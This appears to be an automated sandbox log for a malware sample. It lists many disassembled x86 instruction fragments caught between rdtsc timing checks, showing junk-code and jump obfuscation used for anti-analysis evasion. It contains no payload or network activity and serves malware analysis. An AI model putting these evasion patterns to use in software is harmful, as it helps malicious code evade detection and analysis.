Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2F605 second address: B2F615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B363C9 second address: B363E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B374A6 second address: B374AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B34656 second address: B34716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC750FDC8F2h 0x00000008 jmp 00007FC750FDC8F4h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 jmp 00007FC750FDC8F3h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f pushad 0x00000020 or eax, 0E9043BAh 0x00000026 pushad 0x00000027 jmp 00007FC750FDC8F3h 0x0000002c mov dword ptr [ebp+122D2706h], esi 0x00000032 popad 0x00000033 popad 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b jmp 00007FC750FDC8F6h 0x00000040 mov eax, dword ptr [ebp+122D15A5h] 0x00000046 push 00000000h 0x00000048 push edx 0x00000049 call 00007FC750FDC8E8h 0x0000004e pop edx 0x0000004f mov dword ptr [esp+04h], edx 0x00000053 add dword ptr [esp+04h], 00000019h 0x0000005b inc edx 0x0000005c push edx 0x0000005d ret 0x0000005e pop edx 0x0000005f ret 0x00000060 push FFFFFFFFh 0x00000062 mov di, si 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a jo 00007FC750FDC8E6h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B34716 second address: B3471C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B3768B second address: B37698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B42165 second address: B42174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FC750B60C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B422EE second address: B42309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnc 00007FC750FDC8ECh 0x0000000b je 00007FC750FDC8E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FC750FDC8E6h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B42309 second address: B4230D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4244F second address: B4248F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC750FDC8F2h 0x00000008 jg 00007FC750FDC8E6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FC750FDC8EBh 0x00000019 jmp 00007FC750FDC8ECh 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4248F second address: B424A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC750B60C26h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c js 00007FC750B60C26h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B45846 second address: B45898 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC750FDC8F3h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c jne 00007FC750FDC8E8h 0x00000012 pop ecx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jc 00007FC750FDC8E6h 0x00000021 popad 0x00000022 push esi 0x00000023 jbe 00007FC750FDC8E6h 0x00000029 pop esi 0x0000002a popad 0x0000002b mov eax, dword ptr [eax] 0x0000002d push ebx 0x0000002e jmp 00007FC750FDC8EAh 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B45898 second address: B4589E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4589E second address: B458A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B48A17 second address: B48A3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C32h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushad 0x0000000e jo 00007FC750B60C26h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4CA21 second address: B4CA2D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4CA2D second address: B4CA31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4D098 second address: B4D0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FC750FDC905h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4D3A4 second address: B4D3D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Eh 0x00000007 jne 00007FC750B60C26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jo 00007FC750B60C26h 0x00000018 popad 0x00000019 jnl 00007FC750B60C28h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jl 00007FC750B60C26h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4D629 second address: B4D62F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4D77D second address: B4D795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FC750B60C30h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4D795 second address: B4D7A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4D7A2 second address: B4D7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4D7B1 second address: B4D7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4DAD1 second address: B4DAD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4DAD5 second address: B4DADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B4DC2C second address: B4DC31 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B56B57 second address: B56B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC750FDC8E6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC750FDC8F2h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B56B78 second address: B56B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B56CFF second address: B56D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B57478 second address: B57492 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC750B60C2Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B575D3 second address: B575D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B575D7 second address: B5760D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Ch 0x00000007 jmp 00007FC750B60C30h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FC750B60C2Dh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B5760D second address: B57611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B57611 second address: B57628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC750B60C31h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B57628 second address: B57641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC750FDC8F3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B57641 second address: B57645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B578DA second address: B5790A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FC750FDC8EDh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FC750FDC8ECh 0x00000013 jmp 00007FC750FDC8EFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B56876 second address: B5688D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007FC750B60C26h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FC750B60C26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B5DC70 second address: B5DC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007FC750FDC904h 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FC750FDC8E6h 0x00000017 jg 00007FC750FDC8E6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B5DC8D second address: B5DC91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B5CBCE second address: B5CBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B1FE37 second address: B08949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 nop 0x00000007 stc 0x00000008 lea eax, dword ptr [ebp+1247AB81h] 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FC750B60C28h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov di, bx 0x0000002b nop 0x0000002c jmp 00007FC750B60C34h 0x00000031 push eax 0x00000032 push ecx 0x00000033 push edi 0x00000034 jmp 00007FC750B60C39h 0x00000039 pop edi 0x0000003a pop ecx 0x0000003b nop 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007FC750B60C28h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 0000001Bh 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 call dword ptr [ebp+122D38FCh] 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jne 00007FC750B60C26h 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B1FFC9 second address: B1FFCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B1FFCF second address: B1FFD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B1FFD5 second address: B1FFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2066E second address: B2068A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007FC750B60C3Ah 0x0000000d pushad 0x0000000e jmp 00007FC750B60C2Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B208DF second address: B208E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B208E3 second address: B208E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B208E7 second address: B208F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B20A79 second address: B20A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007FC750B60C26h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FC750B60C2Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B5CFEB second address: B5CFF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B5CFF2 second address: B5CFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B5CFF8 second address: B5CFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B5D180 second address: B5D18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC750B60C26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6095B second address: B60960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B60960 second address: B60978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FC750B60C2Bh 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B64E08 second address: B64E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B651EB second address: B651EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B651EF second address: B651F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B651F5 second address: B6521D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC750B60C31h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC750B60C31h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6537E second address: B6539D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 jmp 00007FC750FDC8F1h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6539D second address: B653B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Bh 0x00000007 jng 00007FC750B60C26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B653B2 second address: B653DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FC750FDC8F6h 0x0000000a jnp 00007FC750FDC8E6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B653DA second address: B653F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750B60C33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B653F1 second address: B653F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B649D4 second address: B649DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B649DE second address: B649E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B649E3 second address: B64A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007FC750B60C28h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007FC750B60C2Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FC750B60C26h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B656B6 second address: B656C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6598A second address: B659A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750B60C2Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jo 00007FC750B60C26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B659A6 second address: B659AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B65C3C second address: B65C46 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B65C46 second address: B65C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750FDC8F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B65C63 second address: B65C96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC750B60C36h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC750B60C33h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B65C96 second address: B65C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6A5C0 second address: B6A5C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6A5C5 second address: B6A5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6A5D0 second address: B6A5F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC750B60C2Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC750B60C30h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6A5F6 second address: B6A603 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC750FDC8E8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6A02B second address: B6A051 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC750B60C32h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B6A051 second address: B6A05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FC750FDC8E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
